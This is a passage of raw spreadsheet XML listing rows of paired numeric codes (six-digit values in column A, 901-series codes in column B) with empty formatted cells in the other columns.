    <row r="6302" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6302" s="5">
        <v>700058</v>
      </c>
      <c r="B6302" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D6302" s="5"/>
      <c r="E6302" s="3"/>
      <c r="F6302" s="1"/>
      <c r="H6302" s="1"/>
    </row>
    <row r="6303" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6303" s="5">
        <v>700058</v>
      </c>
      <c r="B6303" s="3">
        <v>901036.005</v>
      </c>
      <c r="D6303" s="5"/>
      <c r="E6303" s="3"/>
      <c r="F6303" s="1"/>
      <c r="H6303" s="1"/>
    </row>
    <row r="6304" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6304" s="5">
        <v>700058</v>
      </c>
      <c r="B6304" s="3">
        <v>901082</v>
      </c>
      <c r="D6304" s="5"/>
      <c r="E6304" s="3"/>
      <c r="F6304" s="1"/>
      <c r="H6304" s="1"/>
    </row>
    <row r="6305" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6305" s="5">
        <v>700058</v>
      </c>
      <c r="B6305" s="3">
        <v>901033</v>
      </c>
      <c r="D6305" s="5"/>
      <c r="E6305" s="3"/>
      <c r="F6305" s="1"/>
      <c r="H6305" s="1"/>
    </row>
    <row r="6306" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6306" s="5">
        <v>700188</v>
      </c>
      <c r="B6306" s="3">
        <v>901140</v>
      </c>
      <c r="D6306" s="5"/>
      <c r="E6306" s="3"/>
      <c r="F6306" s="1"/>
      <c r="H6306" s="1"/>
    </row>
    <row r="6307" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6307" s="5">
        <v>700188</v>
      </c>
      <c r="B6307" s="3">
        <v>901036.005</v>
      </c>
      <c r="D6307" s="5"/>
      <c r="E6307" s="3"/>
      <c r="F6307" s="1"/>
      <c r="H6307" s="1"/>
    </row>
    <row r="6308" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6308" s="5">
        <v>700328</v>
      </c>
      <c r="B6308" s="3">
        <v>901435</v>
      </c>
      <c r="D6308" s="5"/>
      <c r="E6308" s="3"/>
      <c r="F6308" s="1"/>
      <c r="H6308" s="1"/>
    </row>
    <row r="6309" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6309" s="5">
        <v>700328</v>
      </c>
      <c r="B6309" s="3">
        <v>901433</v>
      </c>
      <c r="D6309" s="5"/>
      <c r="E6309" s="3"/>
      <c r="F6309" s="1"/>
      <c r="H6309" s="1"/>
    </row>
    <row r="6310" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6310" s="5">
        <v>700328</v>
      </c>
      <c r="B6310" s="3">
        <v>901432</v>
      </c>
      <c r="D6310" s="5"/>
      <c r="E6310" s="3"/>
      <c r="F6310" s="1"/>
      <c r="H6310" s="1"/>
    </row>
    <row r="6311" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6311" s="5">
        <v>700328</v>
      </c>
      <c r="B6311" s="3">
        <v>901438</v>
      </c>
      <c r="D6311" s="5"/>
      <c r="E6311" s="3"/>
      <c r="F6311" s="1"/>
      <c r="H6311" s="1"/>
    </row>
    <row r="6312" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6312" s="5">
        <v>700328</v>
      </c>
      <c r="B6312" s="3">
        <v>901418</v>
      </c>
      <c r="D6312" s="5"/>
      <c r="E6312" s="3"/>
      <c r="F6312" s="1"/>
      <c r="H6312" s="1"/>
    </row>
    <row r="6313" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6313" s="5">
        <v>700328</v>
      </c>
      <c r="B6313" s="3">
        <v>901429</v>
      </c>
      <c r="D6313" s="5"/>
      <c r="E6313" s="3"/>
      <c r="F6313" s="1"/>
      <c r="H6313" s="1"/>
    </row>
    <row r="6314" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6314" s="5">
        <v>700328</v>
      </c>
      <c r="B6314" s="3">
        <v>901512</v>
      </c>
      <c r="D6314" s="5"/>
      <c r="E6314" s="3"/>
      <c r="F6314" s="1"/>
      <c r="H6314" s="1"/>
    </row>
    <row r="6315" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6315" s="5">
        <v>700328</v>
      </c>
      <c r="B6315" s="3">
        <v>901412</v>
      </c>
      <c r="D6315" s="5"/>
      <c r="E6315" s="3"/>
      <c r="F6315" s="1"/>
      <c r="H6315" s="1"/>
    </row>
    <row r="6316" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6316" s="5">
        <v>700328</v>
      </c>
      <c r="B6316" s="3">
        <v>901533</v>
      </c>
      <c r="D6316" s="5"/>
      <c r="E6316" s="3"/>
      <c r="F6316" s="1"/>
      <c r="H6316" s="1"/>
    </row>
    <row r="6317" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6317" s="5">
        <v>700328</v>
      </c>
      <c r="B6317" s="3">
        <v>901456</v>
      </c>
      <c r="D6317" s="5"/>
      <c r="E6317" s="3"/>
      <c r="F6317" s="1"/>
      <c r="H6317" s="1"/>
    </row>
    <row r="6318" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6318" s="5">
        <v>700328</v>
      </c>
      <c r="B6318" s="3">
        <v>901430</v>
      </c>
      <c r="D6318" s="5"/>
      <c r="E6318" s="3"/>
      <c r="F6318" s="1"/>
      <c r="H6318" s="1"/>
    </row>
    <row r="6319" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6319" s="5">
        <v>700328</v>
      </c>
      <c r="B6319" s="3">
        <v>901582</v>
      </c>
      <c r="D6319" s="5"/>
      <c r="E6319" s="3"/>
      <c r="F6319" s="1"/>
      <c r="H6319" s="1"/>
    </row>
    <row r="6320" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6320" s="5">
        <v>700328</v>
      </c>
      <c r="B6320" s="3">
        <v>901474</v>
      </c>
      <c r="D6320" s="5"/>
      <c r="E6320" s="3"/>
      <c r="F6320" s="1"/>
      <c r="H6320" s="1"/>
    </row>
    <row r="6321" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6321" s="5">
        <v>700328</v>
      </c>
      <c r="B6321" s="3">
        <v>901422</v>
      </c>
      <c r="D6321" s="5"/>
      <c r="E6321" s="3"/>
      <c r="F6321" s="1"/>
      <c r="H6321" s="1"/>
    </row>
    <row r="6322" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6322" s="5">
        <v>700380</v>
      </c>
      <c r="B6322" s="3">
        <v>901059.005</v>
      </c>
      <c r="D6322" s="5"/>
      <c r="E6322" s="3"/>
      <c r="F6322" s="1"/>
      <c r="H6322" s="1"/>
    </row>
    <row r="6323" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6323" s="5">
        <v>700380</v>
      </c>
      <c r="B6323" s="3">
        <v>901485</v>
      </c>
      <c r="D6323" s="5"/>
      <c r="E6323" s="3"/>
      <c r="F6323" s="1"/>
      <c r="H6323" s="1"/>
    </row>
    <row r="6324" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6324" s="5">
        <v>700380</v>
      </c>
      <c r="B6324" s="3">
        <v>901561.00100000005</v>
      </c>
      <c r="D6324" s="5"/>
      <c r="E6324" s="3"/>
      <c r="F6324" s="1"/>
      <c r="H6324" s="1"/>
    </row>
    <row r="6325" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6325" s="5">
        <v>700380</v>
      </c>
      <c r="B6325" s="3">
        <v>901561.00199999998</v>
      </c>
      <c r="D6325" s="5"/>
      <c r="E6325" s="3"/>
      <c r="F6325" s="1"/>
      <c r="H6325" s="1"/>
    </row>
    <row r="6326" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6326" s="5">
        <v>700380</v>
      </c>
      <c r="B6326" s="3">
        <v>901105</v>
      </c>
      <c r="D6326" s="5"/>
      <c r="E6326" s="3"/>
      <c r="F6326" s="1"/>
      <c r="H6326" s="1"/>
    </row>
    <row r="6327" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6327" s="5">
        <v>700380</v>
      </c>
      <c r="B6327" s="3">
        <v>901027</v>
      </c>
      <c r="D6327" s="5"/>
      <c r="E6327" s="3"/>
      <c r="F6327" s="1"/>
      <c r="H6327" s="1"/>
    </row>
    <row r="6328" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6328" s="5">
        <v>700380</v>
      </c>
      <c r="B6328" s="3">
        <v>901055</v>
      </c>
      <c r="D6328" s="5"/>
      <c r="E6328" s="3"/>
      <c r="F6328" s="1"/>
      <c r="H6328" s="1"/>
    </row>
    <row r="6329" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6329" s="5">
        <v>700380</v>
      </c>
      <c r="B6329" s="3">
        <v>901012</v>
      </c>
      <c r="D6329" s="5"/>
      <c r="E6329" s="3"/>
      <c r="F6329" s="1"/>
      <c r="H6329" s="1"/>
    </row>
    <row r="6330" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6330" s="5">
        <v>700380</v>
      </c>
      <c r="B6330" s="3">
        <v>901113</v>
      </c>
      <c r="D6330" s="5"/>
      <c r="E6330" s="3"/>
      <c r="F6330" s="1"/>
      <c r="H6330" s="1"/>
    </row>
    <row r="6331" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6331" s="5">
        <v>700380</v>
      </c>
      <c r="B6331" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D6331" s="5"/>
      <c r="E6331" s="3"/>
      <c r="F6331" s="1"/>
      <c r="H6331" s="1"/>
    </row>
    <row r="6332" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6332" s="5">
        <v>700380</v>
      </c>
      <c r="B6332" s="3">
        <v>901082</v>
      </c>
      <c r="D6332" s="5"/>
      <c r="E6332" s="3"/>
      <c r="F6332" s="1"/>
      <c r="H6332" s="1"/>
    </row>
    <row r="6333" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6333" s="5">
        <v>700380</v>
      </c>
      <c r="B6333" s="3">
        <v>901124</v>
      </c>
      <c r="D6333" s="5"/>
      <c r="E6333" s="3"/>
      <c r="F6333" s="1"/>
      <c r="H6333" s="1"/>
    </row>
    <row r="6334" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6334" s="5">
        <v>700380</v>
      </c>
      <c r="B6334" s="3">
        <v>901497</v>
      </c>
      <c r="D6334" s="5"/>
      <c r="E6334" s="3"/>
      <c r="F6334" s="1"/>
      <c r="H6334" s="1"/>
    </row>
    <row r="6335" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6335" s="5">
        <v>700380</v>
      </c>
      <c r="B6335" s="3">
        <v>901047</v>
      </c>
      <c r="D6335" s="5"/>
      <c r="E6335" s="3"/>
      <c r="F6335" s="1"/>
      <c r="H6335" s="1"/>
    </row>
    <row r="6336" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6336" s="5">
        <v>700142</v>
      </c>
      <c r="B6336" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D6336" s="5"/>
      <c r="E6336" s="3"/>
      <c r="F6336" s="1"/>
      <c r="H6336" s="1"/>
    </row>
    <row r="6337" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6337" s="5">
        <v>700142</v>
      </c>
      <c r="B6337" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D6337" s="5"/>
      <c r="E6337" s="3"/>
      <c r="F6337" s="1"/>
      <c r="H6337" s="1"/>
    </row>
    <row r="6338" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6338" s="5">
        <v>700142</v>
      </c>
      <c r="B6338" s="3">
        <v>901083</v>
      </c>
      <c r="D6338" s="5"/>
      <c r="E6338" s="3"/>
      <c r="F6338" s="1"/>
      <c r="H6338" s="1"/>
    </row>
    <row r="6339" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6339" s="5">
        <v>700142</v>
      </c>
      <c r="B6339" s="3">
        <v>901112</v>
      </c>
      <c r="D6339" s="5"/>
      <c r="E6339" s="3"/>
      <c r="F6339" s="1"/>
      <c r="H6339" s="1"/>
    </row>
    <row r="6340" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6340" s="5">
        <v>700142</v>
      </c>
      <c r="B6340" s="3">
        <v>901027</v>
      </c>
      <c r="D6340" s="5"/>
      <c r="E6340" s="3"/>
      <c r="F6340" s="1"/>
      <c r="H6340" s="1"/>
    </row>
    <row r="6341" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6341" s="5">
        <v>700142</v>
      </c>
      <c r="B6341" s="3">
        <v>901057</v>
      </c>
      <c r="D6341" s="5"/>
      <c r="E6341" s="3"/>
      <c r="F6341" s="1"/>
      <c r="H6341" s="1"/>
    </row>
    <row r="6342" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6342" s="5">
        <v>700142</v>
      </c>
      <c r="B6342" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D6342" s="5"/>
      <c r="E6342" s="3"/>
      <c r="F6342" s="1"/>
      <c r="H6342" s="1"/>
    </row>
    <row r="6343" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6343" s="5">
        <v>700142</v>
      </c>
      <c r="B6343" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D6343" s="5"/>
      <c r="E6343" s="3"/>
      <c r="F6343" s="1"/>
      <c r="H6343" s="1"/>
    </row>
    <row r="6344" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6344" s="5">
        <v>700142</v>
      </c>
      <c r="B6344" s="3">
        <v>901082</v>
      </c>
      <c r="D6344" s="5"/>
      <c r="E6344" s="3"/>
      <c r="F6344" s="1"/>
      <c r="H6344" s="1"/>
    </row>
    <row r="6345" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6345" s="5">
        <v>700491</v>
      </c>
      <c r="B6345" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6345" s="5"/>
      <c r="E6345" s="3"/>
      <c r="F6345" s="1"/>
      <c r="H6345" s="1"/>
    </row>
    <row r="6346" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6346" s="5">
        <v>700491</v>
      </c>
      <c r="B6346" s="3">
        <v>901560.00300000003</v>
      </c>
      <c r="D6346" s="5"/>
      <c r="E6346" s="3"/>
      <c r="F6346" s="1"/>
      <c r="H6346" s="1"/>
    </row>
    <row r="6347" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6347" s="5">
        <v>700491</v>
      </c>
      <c r="B6347" s="3">
        <v>901119</v>
      </c>
      <c r="D6347" s="5"/>
      <c r="E6347" s="3"/>
      <c r="F6347" s="1"/>
      <c r="H6347" s="1"/>
    </row>
    <row r="6348" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6348" s="5">
        <v>700491</v>
      </c>
      <c r="B6348" s="3">
        <v>901020</v>
      </c>
      <c r="D6348" s="5"/>
      <c r="E6348" s="3"/>
      <c r="F6348" s="1"/>
      <c r="H6348" s="1"/>
    </row>
    <row r="6349" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6349" s="5">
        <v>700491</v>
      </c>
      <c r="B6349" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6349" s="5"/>
      <c r="E6349" s="3"/>
      <c r="F6349" s="1"/>
      <c r="H6349" s="1"/>
    </row>
    <row r="6350" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6350" s="5">
        <v>700491</v>
      </c>
      <c r="B6350" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D6350" s="5"/>
      <c r="E6350" s="3"/>
      <c r="F6350" s="1"/>
      <c r="H6350" s="1"/>
    </row>
    <row r="6351" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6351" s="5">
        <v>700491</v>
      </c>
      <c r="B6351" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D6351" s="5"/>
      <c r="E6351" s="3"/>
      <c r="F6351" s="1"/>
      <c r="H6351" s="1"/>
    </row>
    <row r="6352" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6352" s="5">
        <v>700491</v>
      </c>
      <c r="B6352" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D6352" s="5"/>
      <c r="E6352" s="3"/>
      <c r="F6352" s="1"/>
      <c r="H6352" s="1"/>
    </row>
    <row r="6353" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6353" s="5">
        <v>700491</v>
      </c>
      <c r="B6353" s="3">
        <v>901041</v>
      </c>
      <c r="D6353" s="5"/>
      <c r="E6353" s="3"/>
      <c r="F6353" s="1"/>
      <c r="H6353" s="1"/>
    </row>
    <row r="6354" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6354" s="5">
        <v>700491</v>
      </c>
      <c r="B6354" s="3">
        <v>901083</v>
      </c>
      <c r="D6354" s="5"/>
      <c r="E6354" s="3"/>
      <c r="F6354" s="1"/>
      <c r="H6354" s="1"/>
    </row>
    <row r="6355" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6355" s="5">
        <v>700491</v>
      </c>
      <c r="B6355" s="3">
        <v>901564.00300000003</v>
      </c>
      <c r="D6355" s="5"/>
      <c r="E6355" s="3"/>
      <c r="F6355" s="1"/>
      <c r="H6355" s="1"/>
    </row>
    <row r="6356" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6356" s="5">
        <v>700491</v>
      </c>
      <c r="B6356" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D6356" s="5"/>
      <c r="E6356" s="3"/>
      <c r="F6356" s="1"/>
      <c r="H6356" s="1"/>
    </row>
    <row r="6357" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6357" s="5">
        <v>700491</v>
      </c>
      <c r="B6357" s="3">
        <v>901105</v>
      </c>
      <c r="D6357" s="5"/>
      <c r="E6357" s="3"/>
      <c r="F6357" s="1"/>
      <c r="H6357" s="1"/>
    </row>
    <row r="6358" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6358" s="5">
        <v>700491</v>
      </c>
      <c r="B6358" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D6358" s="5"/>
      <c r="E6358" s="3"/>
      <c r="F6358" s="1"/>
      <c r="H6358" s="1"/>
    </row>
    <row r="6359" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6359" s="5">
        <v>700491</v>
      </c>
      <c r="B6359" s="3">
        <v>901036.005</v>
      </c>
      <c r="D6359" s="5"/>
      <c r="E6359" s="3"/>
      <c r="F6359" s="1"/>
      <c r="H6359" s="1"/>
    </row>
    <row r="6360" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6360" s="5">
        <v>700491</v>
      </c>
      <c r="B6360" s="3">
        <v>901571</v>
      </c>
      <c r="D6360" s="5"/>
      <c r="E6360" s="3"/>
      <c r="F6360" s="1"/>
      <c r="H6360" s="1"/>
    </row>
    <row r="6361" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6361" s="5">
        <v>700491</v>
      </c>
      <c r="B6361" s="3">
        <v>901027</v>
      </c>
      <c r="D6361" s="5"/>
      <c r="E6361" s="3"/>
      <c r="F6361" s="1"/>
      <c r="H6361" s="1"/>
    </row>
    <row r="6362" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6362" s="5">
        <v>700491</v>
      </c>
      <c r="B6362" s="3">
        <v>901057</v>
      </c>
      <c r="D6362" s="5"/>
      <c r="E6362" s="3"/>
      <c r="F6362" s="1"/>
      <c r="H6362" s="1"/>
    </row>
    <row r="6363" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6363" s="5">
        <v>700491</v>
      </c>
      <c r="B6363" s="3">
        <v>901090.00300000003</v>
      </c>
      <c r="D6363" s="5"/>
      <c r="E6363" s="3"/>
      <c r="F6363" s="1"/>
      <c r="H6363" s="1"/>
    </row>
    <row r="6364" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6364" s="5">
        <v>700491</v>
      </c>
      <c r="B6364" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D6364" s="5"/>
      <c r="E6364" s="3"/>
      <c r="F6364" s="1"/>
      <c r="H6364" s="1"/>
    </row>
    <row r="6365" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6365" s="5">
        <v>700491</v>
      </c>
      <c r="B6365" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D6365" s="5"/>
      <c r="E6365" s="3"/>
      <c r="F6365" s="1"/>
      <c r="H6365" s="1"/>
    </row>
    <row r="6366" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6366" s="5">
        <v>700491</v>
      </c>
      <c r="B6366" s="3">
        <v>901082</v>
      </c>
      <c r="D6366" s="5"/>
      <c r="E6366" s="3"/>
      <c r="F6366" s="1"/>
      <c r="H6366" s="1"/>
    </row>
    <row r="6367" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6367" s="5">
        <v>700491</v>
      </c>
      <c r="B6367" s="3">
        <v>901016</v>
      </c>
      <c r="D6367" s="5"/>
      <c r="E6367" s="3"/>
      <c r="F6367" s="1"/>
      <c r="H6367" s="1"/>
    </row>
    <row r="6368" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6368" s="5">
        <v>700491</v>
      </c>
      <c r="B6368" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D6368" s="5"/>
      <c r="E6368" s="3"/>
      <c r="F6368" s="1"/>
      <c r="H6368" s="1"/>
    </row>
    <row r="6369" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6369" s="5">
        <v>700491</v>
      </c>
      <c r="B6369" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D6369" s="5"/>
      <c r="E6369" s="3"/>
      <c r="F6369" s="1"/>
      <c r="H6369" s="1"/>
    </row>
    <row r="6370" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6370" s="5">
        <v>700603</v>
      </c>
      <c r="B6370" s="3">
        <v>901134.00100000005</v>
      </c>
      <c r="D6370" s="5"/>
      <c r="E6370" s="3"/>
      <c r="F6370" s="1"/>
      <c r="H6370" s="1"/>
    </row>
    <row r="6371" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6371" s="5">
        <v>700603</v>
      </c>
      <c r="B6371" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D6371" s="5"/>
      <c r="E6371" s="3"/>
      <c r="F6371" s="1"/>
      <c r="H6371" s="1"/>
    </row>
    <row r="6372" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6372" s="5">
        <v>700603</v>
      </c>
      <c r="B6372" s="3">
        <v>901087.00199999998</v>
      </c>
      <c r="D6372" s="5"/>
      <c r="E6372" s="3"/>
      <c r="F6372" s="1"/>
      <c r="H6372" s="1"/>
    </row>
    <row r="6373" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6373" s="5">
        <v>700603</v>
      </c>
      <c r="B6373" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6373" s="5"/>
      <c r="E6373" s="3"/>
      <c r="F6373" s="1"/>
      <c r="H6373" s="1"/>
    </row>
    <row r="6374" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6374" s="5">
        <v>700603</v>
      </c>
      <c r="B6374" s="3">
        <v>901560.00300000003</v>
      </c>
      <c r="D6374" s="5"/>
      <c r="E6374" s="3"/>
      <c r="F6374" s="1"/>
      <c r="H6374" s="1"/>
    </row>
    <row r="6375" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6375" s="5">
        <v>700603</v>
      </c>
      <c r="B6375" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D6375" s="5"/>
      <c r="E6375" s="3"/>
      <c r="F6375" s="1"/>
      <c r="H6375" s="1"/>
    </row>
    <row r="6376" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6376" s="5">
        <v>700603</v>
      </c>
      <c r="B6376" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D6376" s="5"/>
      <c r="E6376" s="3"/>
      <c r="F6376" s="1"/>
      <c r="H6376" s="1"/>
    </row>
    <row r="6377" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6377" s="5">
        <v>700603</v>
      </c>
      <c r="B6377" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D6377" s="5"/>
      <c r="E6377" s="3"/>
      <c r="F6377" s="1"/>
      <c r="H6377" s="1"/>
    </row>
    <row r="6378" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6378" s="5">
        <v>700603</v>
      </c>
      <c r="B6378" s="3">
        <v>901140</v>
      </c>
      <c r="D6378" s="5"/>
      <c r="E6378" s="3"/>
      <c r="F6378" s="1"/>
      <c r="H6378" s="1"/>
    </row>
    <row r="6379" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6379" s="5">
        <v>700603</v>
      </c>
      <c r="B6379" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D6379" s="5"/>
      <c r="E6379" s="3"/>
      <c r="F6379" s="1"/>
      <c r="H6379" s="1"/>
    </row>
    <row r="6380" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6380" s="5">
        <v>700603</v>
      </c>
      <c r="B6380" s="3">
        <v>901480</v>
      </c>
      <c r="D6380" s="5"/>
      <c r="E6380" s="3"/>
      <c r="F6380" s="1"/>
      <c r="H6380" s="1"/>
    </row>
    <row r="6381" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6381" s="5">
        <v>700603</v>
      </c>
      <c r="B6381" s="3">
        <v>901041</v>
      </c>
      <c r="D6381" s="5"/>
      <c r="E6381" s="3"/>
      <c r="F6381" s="1"/>
      <c r="H6381" s="1"/>
    </row>
    <row r="6382" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6382" s="5">
        <v>700603</v>
      </c>
      <c r="B6382" s="3">
        <v>901068</v>
      </c>
      <c r="D6382" s="5"/>
      <c r="E6382" s="3"/>
      <c r="F6382" s="1"/>
      <c r="H6382" s="1"/>
    </row>
    <row r="6383" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6383" s="5">
        <v>700603</v>
      </c>
      <c r="B6383" s="3">
        <v>901210</v>
      </c>
      <c r="D6383" s="5"/>
      <c r="E6383" s="3"/>
      <c r="F6383" s="1"/>
      <c r="H6383" s="1"/>
    </row>
    <row r="6384" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6384" s="5">
        <v>700603</v>
      </c>
      <c r="B6384" s="3">
        <v>901008</v>
      </c>
      <c r="D6384" s="5"/>
      <c r="E6384" s="3"/>
      <c r="F6384" s="1"/>
      <c r="H6384" s="1"/>
    </row>
    <row r="6385" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6385" s="5">
        <v>700603</v>
      </c>
      <c r="B6385" s="3">
        <v>901083</v>
      </c>
      <c r="D6385" s="5"/>
      <c r="E6385" s="3"/>
      <c r="F6385" s="1"/>
      <c r="H6385" s="1"/>
    </row>
    <row r="6386" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6386" s="5">
        <v>700603</v>
      </c>
      <c r="B6386" s="3">
        <v>901562</v>
      </c>
      <c r="D6386" s="5"/>
      <c r="E6386" s="3"/>
      <c r="F6386" s="1"/>
      <c r="H6386" s="1"/>
    </row>
    <row r="6387" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6387" s="5">
        <v>700603</v>
      </c>
      <c r="B6387" s="3">
        <v>901070</v>
      </c>
      <c r="D6387" s="5"/>
      <c r="E6387" s="3"/>
      <c r="F6387" s="1"/>
      <c r="H6387" s="1"/>
    </row>
    <row r="6388" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6388" s="5">
        <v>700603</v>
      </c>
      <c r="B6388" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6388" s="5"/>
      <c r="E6388" s="3"/>
      <c r="F6388" s="1"/>
      <c r="H6388" s="1"/>
    </row>
    <row r="6389" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6389" s="5">
        <v>700603</v>
      </c>
      <c r="B6389" s="3">
        <v>901070.00600000005</v>
      </c>
      <c r="D6389" s="5"/>
      <c r="E6389" s="3"/>
      <c r="F6389" s="1"/>
      <c r="H6389" s="1"/>
    </row>
    <row r="6390" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6390" s="5">
        <v>700603</v>
      </c>
      <c r="B6390" s="3">
        <v>901570</v>
      </c>
      <c r="D6390" s="5"/>
      <c r="E6390" s="3"/>
      <c r="F6390" s="1"/>
      <c r="H6390" s="1"/>
    </row>
    <row r="6391" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6391" s="5">
        <v>700603</v>
      </c>
      <c r="B6391" s="3">
        <v>901112</v>
      </c>
      <c r="D6391" s="5"/>
      <c r="E6391" s="3"/>
      <c r="F6391" s="1"/>
      <c r="H6391" s="1"/>
    </row>
    <row r="6392" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6392" s="5">
        <v>700603</v>
      </c>
      <c r="B6392" s="3">
        <v>901106</v>
      </c>
      <c r="D6392" s="5"/>
      <c r="E6392" s="3"/>
      <c r="F6392" s="1"/>
      <c r="H6392" s="1"/>
    </row>
    <row r="6393" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6393" s="5">
        <v>700603</v>
      </c>
      <c r="B6393" s="3">
        <v>901135</v>
      </c>
      <c r="D6393" s="5"/>
      <c r="E6393" s="3"/>
      <c r="F6393" s="1"/>
      <c r="H6393" s="1"/>
    </row>
    <row r="6394" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6394" s="5">
        <v>700603</v>
      </c>
      <c r="B6394" s="3">
        <v>901027</v>
      </c>
      <c r="D6394" s="5"/>
      <c r="E6394" s="3"/>
      <c r="F6394" s="1"/>
      <c r="H6394" s="1"/>
    </row>
    <row r="6395" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6395" s="5">
        <v>700603</v>
      </c>
      <c r="B6395" s="3">
        <v>901120</v>
      </c>
      <c r="D6395" s="5"/>
      <c r="E6395" s="3"/>
